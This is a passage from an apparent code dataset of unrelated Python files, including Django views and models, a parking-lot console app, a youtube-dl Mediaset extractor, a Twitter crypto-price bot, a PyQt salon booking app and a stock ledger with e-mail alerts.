# get worksheet name\n # print('temporary file path:', req_file.temporary_file_path)\n print(req_file)\n\n if True:\n wb = openpyxl.load_workbook(req_file)\n print(wb.sheetnames)\n sheet_name = wb.sheetnames[0]\n print(sheet_name)\n ws = wb[sheet_name]\n df = pd.DataFrame(ws.values)\n else:\n xl = pd.ExcelFile(req_file)\n if debug_level > 0:\n print(xl.sheet_names)\n # single worksheet - Data\n sheet_name = xl.sheet_names[0]\n df = xl.parse(sheet_name)\n\n # can be 'Data'\n # can be 'Average MCap Jan Jun 2020'\n if sheet_name != 'Data':\n print(\"sheet name changed to\", sheet_name)\n\n # ignore top two line : Average Market Capitalization of listed companies during the six months ended\n # remove top two line from dataframe\n df = df.iloc[2:]\n\n if debug_level > 0:\n print(\"old columns : \")\n print(df.columns)\n\n # change column name of data frame\n columns_list = ['stock_symbol', 'comp_name', 'isin_code_id', 'qty', 'acp',\n 'cmp', 'pct_change', 'value_cost', 'value_market',\n 'days_gain', 'days_gain_pct', 'realized_pl', 'unrealized_pl',\n 'unrealized_pl_pct', 'unused1']\n df.columns = columns_list\n\n if debug_level > 0:\n print(\"new columns : \")\n print(df.columns)\n\n # Keep only top 1000 entries\n df = df.iloc[:1000]\n\n # round avg_mcap\n # df = df.round({'avg_mcap' : 1})\n # covert to numeric\n # df[[\"avg_mcap\"]] = df[[\"avg_mcap\"]].apply(pd.to_numeric)\n df[[\"avg_mcap\"]] = df[[\"avg_mcap\"]].astype(int)\n\n # drop columns that are not required\n # skip_columns_list = ['bse_mcap', 'nse_mcap', 'mse_symbol', 'mse_mcap']\n # df.drop(skip_columns_list, axis=1, inplace=True)\n\n data_set = df.to_csv(header=True, index=False)\n\n if req_file.name.endswith('.csv'):\n data_set = req_file.read().decode('UTF-8')\n\n if not (req_file.name.endswith('.csv') or req_file.name.endswith('.xls') or req_file.name.endswith('.xlsx')):\n messages.error(request, req_file.name + ' : THIS IS NOT A XLS/XLSX/CSV FILE.')\n return HttpResponseRedirect(reverse(\"dematsum-list\"))\n\n # delete existing records\n print('Deleted existing DematSum data')\n DematSum.objects.all().delete()\n\n # setup a stream which is when we loop through each line we are able to handle a data in a stream\n\n io_string = io.StringIO(data_set)\n next(io_string)\n for column in csv.reader(io_string, delimiter=',', quotechar='\"'):\n column[0] = column[0].strip()\n column[1] = column[1].strip()\n\n _, created = DematSum.objects.update_or_create(\n stock_symbol=column[0],\n comp_name=column[1],\n isin_code_id=column[2],\n qty=column[3],\n acp=column[4],\n cmp=column[5],\n pct_change=column[6],\n value_cost=column[7],\n value_market=column[8],\n days_gain=column[9],\n days_gain_pct=column[10],\n realized_pl=column[11],\n unrealized_pl=column[12],\n unrealized_pl_pct=column[13],\n unused1=column[14]\n )\n # context = {}\n # render(request, template, context)\n lastrefd_update(\"dematsum\")\n #\n print('Completed loading new Dematsum data')\n return HttpResponseRedirect(reverse(\"dematsum-list\"))\n\n# from django.http import HttpResponse\n# def index(request):\n# return HttpResponse(\"Hello, world. You're at the polls index.\")\n#\n","sub_path":"django_gotolong/dematsum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"158319801","text":"from django.db import models\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nfrom collections import Counter\nfrom django.urls import reverse\n\n\n__all__ = ('Player', 'Match', 'Event', 'Attendance')\n\n\nclass Player(models.Model):\n name = models.CharField(max_length=128, verbose_name='Imię i nazwisko')\n birth_date = models.DateField(null=True, blank=True, verbose_name='data urodzenia')\n adress = models.CharField(max_length=128, blank=True, verbose_name='adres')\n med_check_date = models.DateField(null=True, blank=True, verbose_name='data badania')\n licence_number = models.IntegerField(null=True, blank=True, verbose_name='nr licencji')\n elo_rating = models.SmallIntegerField(default=1200)\n\n class Meta:\n verbose_name = 'Zawodnik'\n verbose_name_plural = 'Zawodnicy'\n\n def __str__(self):\n return self.name\n\n def med_check(self):\n med_check_date = self.med_check_date\n med_check_span = relativedelta(datetime.date.today(), med_check_date)\n return {'med_check_span': med_check_span}\n\n def performance(self):\n wins_1, wins_2, win_list, loss_list = 0, 0, [], []\n match_1 = self.player_1.all()\n match_2 = self.player_2.all()\n if match_1 or match_2:\n for m in match_1:\n if m.result_pl_1 == 3:\n wins_1 += 1\n win_list.append(m.player_2.name)\n else:\n loss_list.append(m.player_2.name)\n for m in match_2:\n if m.result_pl_2 == 3:\n wins_2 += 1\n win_list.append(m.player_1.name)\n else:\n loss_list.append(m.player_1.name)\n success_rate = (round((wins_1 + wins_2) / (len(match_1) + len(match_2)) * 100, 2))\n failure_rate = 100 - success_rate\n else:\n success_rate = 'Brak pojedynków'\n failure_rate = 'Brak pojedynków'\n defeated = Counter(win_list).most_common(3)\n defeated_by = Counter(loss_list).most_common(3)\n return {'success_rate': success_rate,\n 'failure_rate': failure_rate,\n 'defeated': defeated,\n 'defeated_by': defeated_by}\n\n\nclass Match(models.Model):\n RESULT = (\n (0, '0'),\n (1, '1'),\n (2, '2'),\n (3, '3'),\n )\n player_1 = models.ForeignKey('Player', related_name='player_1', null=True, verbose_name='zawodnik 1')\n player_2 = models.ForeignKey('Player', related_name='player_2', null=True, verbose_name='zawodnik 2')\n player_1_result = models.PositiveSmallIntegerField(choices=RESULT, default=0, verbose_name='wynik zawodnika 1')\n player_2_result = models.PositiveSmallIntegerField(choices=RESULT, default=0, verbose_name='wynik zawodnika 2')\n description = models.TextField(blank=True, null=True, verbose_name='opis')\n date = models.DateField(verbose_name='data')\n\n class Meta:\n verbose_name = 'Pojedynek'\n verbose_name_plural = 'Pojedynki'\n\n def __str__(self):\n return '{} - {} - {}'.format(self.player_1, self.player_2, self.date)\n\n def save(self, *args, **kwargs):\n try:\n player_1 = Player.objects.get(pk=self.player_1.pk)\n player_2 = Player.objects.get(pk=self.player_2.pk)\n player_1_elo = player_1.elo_rating\n player_2_elo = player_2.elo_rating\n expected_1 = 1 / (1 + 10 ** ((player_2_elo - player_1_elo) / 400))\n expected_2 = 1 / (1 + 10 ** ((player_1_elo - player_2_elo) / 400))\n if self.player_1_result == 3:\n player_1_new_elo = player_1.elo_rating + 32 * (1 - expected_1)\n player_2_new_elo = player_2.elo_rating + 32 * (0 - expected_2)\n else:\n player_1_new_elo = player_1.elo_rating + 32 * (0 - expected_2)\n player_2_new_elo = player_2.elo_rating + 32 * (1 - expected_1)\n player_1.elo_rating = player_1_new_elo\n player_2.elo_rating = player_2_new_elo\n player_1.save()\n player_2.save()\n except Exception as e:\n print(e)\n super(Match, self).save(*args, **kwargs)\n\n\nclass Event(models.Model):\n name = models.CharField(max_length=255, null=True, verbose_name='nazwa')\n description = models.TextField(blank=True, null=True, verbose_name='opis')\n start = models.DateTimeField(null=True)\n end = models.DateTimeField(null=True, verbose_name='koniec')\n\n class Meta:\n verbose_name = 'Wydarzenie'\n verbose_name_plural = 'Wydarzenia'\n\n def __str__(self):\n return self.name\n\n\nclass Attendance(models.Model):\n players = models.ManyToManyField(Player, verbose_name='Zawodnik')\n event = models.ForeignKey(Event, verbose_name='Wydarzenie')\n present = models.BooleanField()\n\n def get_absolute_url(self):\n return reverse ('event', kwargs={'pk': self.event.pk})","sub_path":"tenisowka_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"114492633","text":"class Parking_lot:\n\n def __init__(self,name,size):\n self.name = name\n self.size = size\n self.slots = [(0,0)] * self.size\n\n \n def park_car(self, Registration_no, Color ):\n \n Empty_slot = self.get_slot()\n if Empty_slot == -1:\n print(\"Parking space is full, no slots available!\")\n return None\n self.slots[Empty_slot] = (Registration_no, Color)\n print(f\"Please park your Car in slot number : {Empty_slot}\")\n\n def Exit(self,Registration_no):\n for slot in range(self.size):\n if self.slots[slot][0] == Registration_no:\n self.slots[slot] = (0,0)\n return slot\n\n def Cars_by_color(self,):\n pass\n\n def slot_of_car_by_Reg_no (self,Registration_no):\n \n for slot in range(self.size):\n if self.slots[slot][0] == Registration_no:\n print(f\"The Car with Registration number '{Registration_no}' is parked in slot no. {slot}\")\n break\n else:\n print(\"There is no such car parked here\")\n\n def slots_of_cars_by_color (self,Color):\n Same_colored_cars = []\n \n for i in range(self.size):\n if self.slots[i][1] == Color:\n Same_colored_cars.append(i)\n\n print(f\"The cars with color {Color} is present is following slots: {Same_colored_cars}\")\n\n\n def get_slot(self):\n for slot in range(self.size):\n if self.slots[slot] == (0,0):\n return slot\n else:\n return -1\n\n\n\n def checkout_bill(self):\n pass\n\n def View_parking_arena(self):\n\n print(\"Slot No.\\tRegistration No.\\tColor\")\n \n for i in range(self.size):\n if self.slots[i] != (0,0):\n print(str(i) + \"\\t\\t\" +str(self.slots[i][0]) + \"\\t\\t\" + str(self.slots[i][1]))\n else:\n continue\n\n\nif __name__ == \"__main__\":\n\n # Parking_lot = Parking_lot(\"SafePark\",6)\n # Parking_lot.park_car(\"KA51-AA-5396\", \"Red\")\n # Parking_lot.slot_of_car_by_Reg_no(\"KA51-AA-5396\")\n\n\n Name = input(\"What is the name of Parking lot: \")\n Size = int(input(\"How much car can it hold? \"))\n Parking_lot = Parking_lot(Name, Size) \n print(f\"Welcome to {Name}, we can accomodate up to {Size} cars\")\n\n def Menu():\n print(\"\"\"\n Please find the MENU below:\n\n Press 1 to park your car\n Press 2 to exit the parking lot\n Press 3 to know your car slot\n Press 4 to know all the slots for cars of particular color\n press 5 to get the nearest empty slot\n Type Exit or Quit to end the prompt\n\n \"\"\")\n Menu()\n while True:\n\n Options = input()\n\n if Options == \"1\":\n Reg_no = input(\"Please Enter the registration number: \")\n Color = input(\"What is the color of your car? \")\n Parking_lot.park_car(Reg_no,Color)\n\n elif Options == \"2\":\n Reg_no = input(\"Please Enter the registration number: \")\n # Parking_lot.Exit(Reg_no)\n print(f\"Your car with Reg_no - {Reg_no} is exited from slot no. {Parking_lot.Exit(Reg_no)}\")\n\n elif Options == \"3\":\n Reg_no = input(\"Please Enter the registration number of your car: \")\n Parking_lot.slot_of_car_by_Reg_no(Reg_no)\n\n \n elif Options == \"4\":\n Color = input(\"Please type the color of the car: \").lower()\n Parking_lot.slots_of_cars_by_color(Color)\n\n elif Options == \"5\":\n print(f\"The nearest empty slot is: {Parking_lot.get_slot()}\")\n\n elif Options == \"6\":\n Parking_lot.View_parking_arena()\n\n elif Options.lower() == \"quit\" or Options.lower() == \"exit\":\n print(f\"Thank you for choosing {Name}, Please visit again!\")\n break\n\n else:\n print(\"Invalid choice, please select a valid option from the Menu\")\n Menu()\n\n\n\n\n\n\n\n\n\n","sub_path":"Projects/Parkinglot/Parking lot/Parking_lot_fs.py","file_name":"Parking_lot_fs.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"391740677","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom .common import InfoExtractor\nfrom ..compat import compat_str\nfrom ..utils import (\n determine_ext,\n parse_duration,\n try_get,\n unified_strdate,\n)\n\n\nclass MediasetIE(InfoExtractor):\n _VALID_URL = r'''(?x)\n (?:\n mediaset:|\n https?://\n (?:www\\.)?video\\.mediaset\\.it/\n (?:\n (?:video|on-demand)/(?:[^/]+/)+[^/]+_|\n player/playerIFrame(?:Twitter)?\\.shtml\\?.*?\\bid=\n )\n )(?P[0-9]+)\n '''\n _TESTS = [{\n # full episode\n 'url': 'http://www.video.mediaset.it/video/hello_goodbye/full/quarta-puntata_661824.html',\n 'md5': '9b75534d42c44ecef7bf1ffeacb7f85d',\n 'info_dict': {\n 'id': '661824',\n 'ext': 'mp4',\n 'title': 'Quarta puntata',\n 'description': 'md5:7183696d6df570e3412a5ef74b27c5e2',\n 'thumbnail': r're:^https?://.*\\.jpg$',\n 'duration': 1414,\n 'creator': 'mediaset',\n 'upload_date': '20161107',\n 'series': 'Hello Goodbye',\n 'categories': ['reality'],\n },\n 'expected_warnings': ['is not a supported codec'],\n }, {\n 'url': 'http://www.video.mediaset.it/video/matrix/full_chiambretti/puntata-del-25-maggio_846685.html',\n 'md5': '1276f966ac423d16ba255ce867de073e',\n 'info_dict': {\n 'id': '846685',\n 'ext': 'mp4',\n 'title': 'Puntata del 25 maggio',\n 'description': 'md5:ee2e456e3eb1dba5e814596655bb5296',\n 'thumbnail': r're:^https?://.*\\.jpg$',\n 'duration': 6565,\n 'creator': 'mediaset',\n 'upload_date': '20180525',\n 'series': 'Matrix',\n 'categories': ['infotainment'],\n },\n 'expected_warnings': ['HTTP Error 403: Forbidden'],\n }, {\n # clip\n 'url': 'http://www.video.mediaset.it/video/gogglebox/clip/un-grande-classico-della-commedia-sexy_661680.html',\n 'only_matching': True,\n }, {\n # iframe simple\n 'url': 'http://www.video.mediaset.it/player/playerIFrame.shtml?id=665924&autoplay=true',\n 'only_matching': True,\n }, {\n # iframe twitter (from http://www.wittytv.it/se-prima-mi-fidavo-zero/)\n 'url': 'https://www.video.mediaset.it/player/playerIFrameTwitter.shtml?id=665104&playrelated=false&autoplay=false&related=true&hidesocial=true',\n 'only_matching': True,\n }, {\n 'url': 'mediaset:661824',\n 'only_matching': True,\n }]\n\n @staticmethod\n def _extract_urls(webpage):\n return [\n mobj.group('url')\n for mobj in re.finditer(\n r']+\\bsrc=([\"\\'])(?Phttps?://(?:www\\.)?video\\.mediaset\\.it/player/playerIFrame(?:Twitter)?\\.shtml\\?.*?\\bid=\\d+.*?)\\1',\n webpage)]\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n\n video = self._download_json(\n 'https://www.video.mediaset.it/html/metainfo.sjson',\n video_id, 'Downloading media info', query={\n 'id': video_id\n })['video']\n\n title = video['title']\n media_id = video.get('guid') or video_id\n\n video_list = self._download_json(\n 'http://cdnsel01.mediaset.net/GetCdn2018.aspx',\n video_id, 'Downloading video CDN JSON', query={\n 'streamid': media_id,\n 'format': 'json',\n })['videoList']\n\n formats = []\n for format_url in video_list:\n ext = determine_ext(format_url)\n if ext == 'm3u8':\n formats.extend(self._extract_m3u8_formats(\n format_url, video_id, 'mp4', entry_protocol='m3u8_native',\n m3u8_id='hls', fatal=False))\n elif ext == 'mpd':\n formats.extend(self._extract_mpd_formats(\n format_url, video_id, mpd_id='dash', fatal=False))\n elif ext == 'ism' or '.ism' in format_url:\n formats.extend(self._extract_ism_formats(\n format_url, video_id, ism_id='mss', fatal=False))\n else:\n formats.append({\n 'url': format_url,\n 'format_id': determine_ext(format_url),\n })\n self._sort_formats(formats)\n\n creator = try_get(\n video, lambda x: x['brand-info']['publisher'], compat_str)\n category = try_get(\n video, lambda x: x['brand-info']['category'], compat_str)\n categories = [category] if category else None\n\n return {\n 'id': video_id,\n 'title': title,\n 'description': video.get('short-description'),\n 'thumbnail': video.get('thumbnail'),\n 'duration': parse_duration(video.get('duration')),\n 'creator': creator,\n 'upload_date': unified_strdate(video.get('production-date')),\n 'webpage_url': video.get('url'),\n 'series': video.get('brand-value'),\n 'season': video.get('season'),\n 'categories': categories,\n 'formats': formats,\n }\n","sub_path":"youtube_dl/extractor/mediaset.py","file_name":"mediaset.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"481854446","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def minDiffInBST(self, root: TreeNode) -> int:\n result, prev = float('inf'), float('-inf')\n def inorder(node):\n nonlocal result, prev\n if node:\n inorder(node.left)\n result = min(result, node.val - prev)\n prev = node.val\n inorder(node.right)\n inorder(root)\n return result","sub_path":"LeetCode/Minimum Distance Between BST Nodes.py","file_name":"Minimum Distance Between BST Nodes.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"52431041","text":"import greenthumb\nimport flask\nimport json\n\nfrom greenthumb import util\nimport mongoengine\n\"\"\"\n\nGreenThumb REST API: guides.\n\nGreenThumb Group \n\n\"\"\"\n\n@greenthumb.app.route('/api/v1/guides/', methods=['GET'])\ndef get_guides():\n\n \"\"\" Route to get the guide page list \"\"\"\n\n guides = []\n\n with util.MongoConnect():\n for guide in greenthumb.models.mongo.guides.objects():\n guides.append(json.loads(guide.to_json()))\n\n return flask.jsonify(guides)\n\n@greenthumb.app.route('/api/v1/guides//', methods=['GET'])\ndef get_guide_page(guide_page_id):\n\n \"\"\" Route to get a guide page \"\"\"\n\n guide = {}\n\n with util.MongoConnect():\n guide = greenthumb.models.mongo.guides.objects.get(id=guide_page_id)\n\n return flask.jsonify(guide.to_dict())\n","sub_path":"backend/greenthumb/api/guides.py","file_name":"guides.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"145782633","text":"from API_Twitter import api\nfrom time import sleep\nfrom cryptos import crypto_price\nfrom dailys import daily_posts\nfrom database import check_user_db, get_user, retweet_autentication\n\nmentions = api.mentions_timeline()\nFILE_NAME = \"last_seen_id.txt\"\n\ndef retrieve_last_seen_id(file_name):\n f_read = open(file_name, 'r')\n last_seen_id = int(f_read.read().strip())\n f_read.close()\n return last_seen_id\n\ndef store_last_seen_id(last_seen_id, file_name):\n f_write = open(file_name, 'w')\n f_write.write(str(last_seen_id))\n f_write.close()\n return\ndef analise():\n last_seen_id = retrieve_last_seen_id(FILE_NAME)\n mentions = api.mentions_timeline(\n since_id=last_seen_id,\n tweet_mode='extended')\n cryptos = [['#bitcoin', 'do Bitcoin', 'bitcoin'], ['#ethereum', 'do Ethereum', 'ethereum'],\n ['#nano', 'da Nano', 'nano'],['#litecoin', 'da Litecoin', 'litecoin'],\n ['#monero', 'do Monero', 'monero'], ['#dash', 'da Dash', 'dash']]\n\n for mention in reversed(mentions):\n print(str(mention.id) + ' - ' + mention.full_text)\n last_seen_id = mention.id\n store_last_seen_id(last_seen_id,FILE_NAME)\n porc = (('#soça', 'soca', 'soça'), ('#fascista', 'fascista', 'fascista'), ('#ancap', 'ancap', 'ancap'), ('#comunista', 'soca', 'comunista'))\n #Analise de #\n if '#retweet' in mention.full_text.lower():\n autenticado = False\n for x in retweet_autentication():\n if mention.user.screen_name in x[0]:\n autenticado = True\n if autenticado == True:\n reply_id = api.get_status (mention.id).in_reply_to_status_id\n api.retweet(reply_id)\n else:\n api.send_direct_message (mention.user.id, 'Voce nao tem permissao para usar o #retweet')\n elif '#crypto' in mention.full_text.lower():\n crypto_str = crypto_price('todos')\n crypto_str = crypto_str.strip()\n api.update_status('@' + mention.user.screen_name + '\\n'\n f'{crypto_str}', mention.id)\n elif '#cripto' in mention.full_text.lower():\n crypto_str = crypto_price('todos')\n crypto_str = crypto_str.strip()\n api.update_status('@' + mention.user.screen_name + '\\n'\n f'{crypto_str}', mention.id)\n else:\n for x in cryptos:\n if x[0] in mention.full_text.lower():\n api.update_status('@' + mention.user.screen_name +\n f' O preço {x[1]} é: $' + f'{crypto_price(x[2]):.2f} dolares', mention.id)\n for x in porc:\n if x[0] in mention.full_text.lower():\n check_user_db(mention.user.screen_name)\n api.update_status('@' + mention.user.screen_name + '\\n'\n f'Voce é {get_user(mention.user.screen_name, x[1])}% {x[2]}!', mention.id)\n\nwhile True:\n daily_posts()\n analise()\n sleep(15)\n","sub_path":"MAIN.py","file_name":"MAIN.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"201837671","text":"import sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5 import uic\nimport sqlite3\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QErrorMessage\nfrom project.mainwin import Ui_MainWindow\nfrom project.salonwin import Ui_choose_salon\nfrom project.myregwin import Ui_my_register\n\n\nclass RegisterForm(Ui_MainWindow, QMainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.i = ''\n self.salons1 = Salons()\n self.registers = Registers()\n self.pushButton.clicked.connect(self.description_add)\n self.flag = False\n self.save_button.clicked.connect(self.button_function)\n self.check_register.clicked.connect(self.registers.show)\n self.data_salons = {}\n self.procedure_and_salon = {}\n self.data_procedures = {}\n self.load_db()\n self.load_main()\n\n def button_function(self):\n if self.name.text() and self.flag == True:\n self.salons1.show()\n self.flag = False\n with open(\"datapersons\", \"a\") as file:\n file.write(self.name.text() + ',')\n file.write(str(self.procedures.currentText()) + ',')\n else:\n error_dialog = QErrorMessage()\n error_dialog.showMessage(\"Введены не все данные\")\n error_dialog.exec_()\n\n def load_db(self):\n con = sqlite3.connect(\"MyDataBase.db\")\n cur = con.cursor()\n names_procedures = []\n descriptions = []\n list_names_procedures = cur.execute(\"\"\"SELECT name_procedure, salon FROM procedure\"\"\").fetchall()\n list_descriptions = cur.execute(\"\"\"SELECT description FROM procedure\"\"\").fetchall()\n for elem in list_names_procedures:\n if elem[0] not in names_procedures:\n names_procedures.append(elem[0])\n for elem in list_descriptions:\n if elem[0] not in descriptions:\n descriptions.append(elem[0])\n for i in range(len(names_procedures)):\n self.data_procedures[names_procedures[i]] = descriptions[i]\n for i in range(len(list_names_procedures)):\n if list_names_procedures[i][0] not in self.procedure_and_salon.keys():\n self.procedure_and_salon[list_names_procedures[i][0]] = [list_names_procedures[i][1]]\n else:\n self.procedure_and_salon[list_names_procedures[i][0]].append(list_names_procedures[i][1])\n self.data_salons = cur.execute(\"\"\"SELECT * FROM salon\"\"\").fetchall()\n con.close()\n\n def load_main(self):\n for i in self.data_procedures:\n self.procedures.addItem(i)\n\n def description_add(self):\n text = self.procedures.currentText()\n for i in self.data_procedures.keys():\n if i == text:\n self.description_procedure.clear()\n self.description_procedure.appendPlainText(self.data_procedures[i])\n self.description_procedure.setReadOnly(True)\n self.flag = True\n\n\nclass Salons(QWidget, Ui_choose_salon):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.data_salons = {}\n self.flag = False\n self.time = ''\n self.date = ''\n self.data_procedures = {}\n self.load_db()\n self.load_choose()\n self.pushButton.clicked.connect(self.description_add)\n self.save_register.clicked.connect(self.register)\n\n def load_choose(self):\n for i in self.data_salons:\n self.choose_sal.addItem(i[1])\n\n def load_db(self):\n con = sqlite3.connect(\"MyDataBase.db\")\n cur = con.cursor()\n names_procedures = []\n descriptions = []\n list_names_procedures = cur.execute(\"\"\"SELECT name_procedure, salon FROM procedure\"\"\").fetchall()\n list_descriptions = cur.execute(\"\"\"SELECT description FROM procedure\"\"\").fetchall()\n for elem in list_names_procedures:\n if elem[0] not in names_procedures:\n names_procedures.append(elem[0])\n for elem in list_descriptions:\n if elem[0] not in descriptions:\n descriptions.append(elem[0])\n for i in range(len(names_procedures)):\n self.data_procedures[names_procedures[i]] = descriptions[i]\n '''for i in range(len(list_names_procedures)):\n if list_names_procedures[i][0] not in self.procedure_and_salon.keys():\n self.procedure_and_salon[list_names_procedures[i][0]] = [list_names_procedures[i][1]]\n else:\n self.procedure_and_salon[list_names_procedures[i][0]].append(list_names_procedures[i][1])'''\n self.data_salons = cur.execute(\"\"\"SELECT * FROM salon\"\"\").fetchall()\n con.close()\n\n def description_add(self):\n self.flag = True\n text = self.choose_sal.currentText()\n for i in self.data_salons:\n if i[1] == text:\n self.description_salon.clear()\n st = f\"{i[2]}\\n{i[3]} \"\n self.description_salon.appendPlainText(st)\n self.description_salon.setReadOnly(True)\n\n def register(self):\n if self.flag:\n self.flag = False\n self.date = self.dateTimeEdit.dateTime().toString('dd-MM-yyyy')\n self.time = self.dateTimeEdit.dateTime().toString('hh:mm')\n with open(\"datapersons\", 'a') as file:\n file.write(self.choose_sal.currentText() + ',')\n file.write(self.date + ',')\n file.write(self.time)\n file.write('\\n')\n self.close()\n else:\n error_dialog = QErrorMessage()\n error_dialog.showMessage(\"Введены не все данные\")\n error_dialog.exec_()\n\n\nclass Registers(QWidget, Ui_my_register):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.okbutton.clicked.connect(self.button)\n\n def button(self):\n self.listWidget.clear()\n lst = []\n if self.name_r.text():\n with open(\"datapersons\", \"r\") as file:\n for line in file:\n lst.append(line.split(','))\n date = self.calendarWidget.selectedDate().toString(\"dd-MM-yyyy\")\n name = self.name_r.text()\n for elem in lst:\n if elem[0] == name and elem[3] == date:\n self.listWidget.addItem(f\"{elem[4]} {elem[1]} {elem[2]}\")\n\n\nsys._excepthook = sys.excepthook\n\n\ndef exception_hook(exctype, value, traceback):\n sys._excepthook(exctype, value, traceback)\n sys.exit(1)\n\n\nsys.excepthook = exception_hook\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ex = RegisterForm()\n ex.show()\n sys.exit(app.exec_())","sub_path":"project/programm.py","file_name":"programm.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"363850528","text":"import os\r\nimport collections\r\n\r\n#Получаем список расширений всех файлов\r\n\r\ndef ext():\r\n types = []\r\n for root, dirs, files in os.walk('.'):\r\n for fl in files:\r\n filename, file_extension = os.path.splitext(fl)\r\n types.append(file_extension)\r\n return types\r\n\r\n#Делаем из них частотный словарь\r\n\r\ndef freq(d):\r\n counter = collections.Counter(d)\r\n counter = collections.Counter(counter).most_common(1)[0][0]\r\n return counter\r\n\r\n###Находим самое частотное - это какой-то сложный вариант, я нашла .most_common()\r\n## \r\n##def first(d):\r\n## main = sorted(d, key=d.get, reverse=True)\r\n## return 'Чаще всего встречаются: ' + '\\\"' + main[0] + \\\r\n## '\\\":' + '\\t' + str(d[main[0]])\r\n\r\n\r\ndef main():\r\n print('Самое частое разрешение: ', freq(ext()))\r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"hw13/hw13.py","file_name":"hw13.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"32422144","text":"from sys import stdin\ndef main():\n longitud=int(stdin.readline().strip())\n while longitud!=0:\n cont=0\n rangos=[int(x) for x in stdin.readline().strip().split()]\n\n for i in range(1,len(rangos)-1):\n if rangos[i-1]>rangos[i]rangos[i+1]:\n cont+=1\n \n\n if (rangos[-1]>rangos[0]rangos[0]):\n cont+=1\n if (rangos[-1]rangos[1]):\n cont+=1\n\n if (rangos[-2]>rangos[-1] pentru continua'.format(self.limita_avertisment))\r\n\r\n answer = input('Doriti sa trimiteti un e-mail de avertizare? (Y/N)')\r\n\r\n self.sold -= self.cant\r\n\r\n if answer.upper() == 'Y':\r\n sender = input('introduceti adresa dvs de gmail:\\n')\r\n passw = input('introduceti parola dvs de gmail:\\n')\r\n receiver = input('introduceti adresa la care doriti sa trimiteti mailul de avertizare:\\n')\r\n subiect_ma = 'Limita de {0} a fost atinsa pentru soldul produsului: {1}'.format(self.limita_avertisment,\r\n self.prod)\r\n text_ma = 'Soldul produsului {0} este acum: {1}'.format(self.prod, self.sold)\r\n mesaj_avertizare='Subject: {0}\\n\\n{1}'.format(subiect_ma,text_ma)\r\n conexiune = smtplib.SMTP_SSL('smtp.gmail.com', 465)\r\n conexiune.login(user=sender, password=passw)\r\n conexiune.sendmail(from_addr=sender, to_addrs=receiver, msg=mesaj_avertizare)\r\n else:\r\n pass\r\n\r\n if self.d.keys():\r\n cheie = max(self.d.keys()) + 1\r\n else:\r\n cheie = 1\r\n self.e[cheie] = self.cant # similar, introducem datele in dictionarele iesiri si data\r\n self.d[cheie] = self.data\r\n\r\n def fisap(self):\r\n self.f1 = tempfile.mktemp('f1.txt')\r\n self.f2 = open(self.f1, 'w+')\r\n print('Fisa produsului ' + self.prod + ': ' + self.um)\r\n self.f2.write('Fisa produsului ' + self.prod + ': ' + self.um)\r\n print(40 * '-')\r\n self.f2.write('\\n'+40 * '-')\r\n print(' Nrc ', ' Data ', 'Intrari', 'Iesiri')\r\n self.f2.write('\\n'+' Nrc '+' Data '+'Intrari '+' Iesiri')\r\n print(40 * '-')\r\n self.f2.write('\\n'+40 * '-')\r\n\r\n for v in self.d.keys():\r\n if v in self.i.keys():\r\n print(str(v).rjust(5), self.d[v], str(self.i[v]).rjust(6), str(0).rjust(6))\r\n a = str(v).rjust(2) + ' '+ str(self.d[v])+str(self.i[v]).rjust(6)+str(0).rjust(6)\r\n self.f2.write('\\n'+a)\r\n else:\r\n print(str(v).rjust(5), str(self.d[v]).rjust(5), str(0).rjust(6), str(self.e[v]).rjust(6))\r\n a = str(v).rjust(2)+' '+str(self.d[v]).rjust(5)+str(0).rjust(6)+str(self.e[v]).rjust(6)\r\n self.f2.write('\\n'+a)\r\n\r\n print(40 * '-')\r\n\r\n self.f2.write('\\n'+40 * '-')\r\n\r\n print('Stoc actual: ' + str(self.sold).rjust(10))\r\n self.f2.write('\\n'+'Stoc actual: ' + str(self.sold).rjust(10))\r\n\r\n print(40 * '-')\r\n self.f2.write('\\n'+40 * '-')\r\n self.f2.close()\r\n\r\n self.f3 = open(self.f1, 'r')\r\n\r\n def grafic(self):\r\n # 1. Implementati o solutie care sa returneze o proiectie grafica a intrarilor si iesirilor intr-o\r\n # anumita perioada, pentru un anumit produs;\t--pygal--\r\n data_start = int(input('Introduceti data start (format AAAALLZZ): '))\r\n data_sfarsit = int(input('Introduceti data sfarsit (format AAAALLZZ): '))\r\n self.dictionar_intrari = {}\r\n self.dictionar_iesiri = {}\r\n lista_chei_data=[]\r\n lista_temp_i=[]\r\n lista_temp_e = []\r\n for q in self.d.items():\r\n if data_start <= int(q[1]) 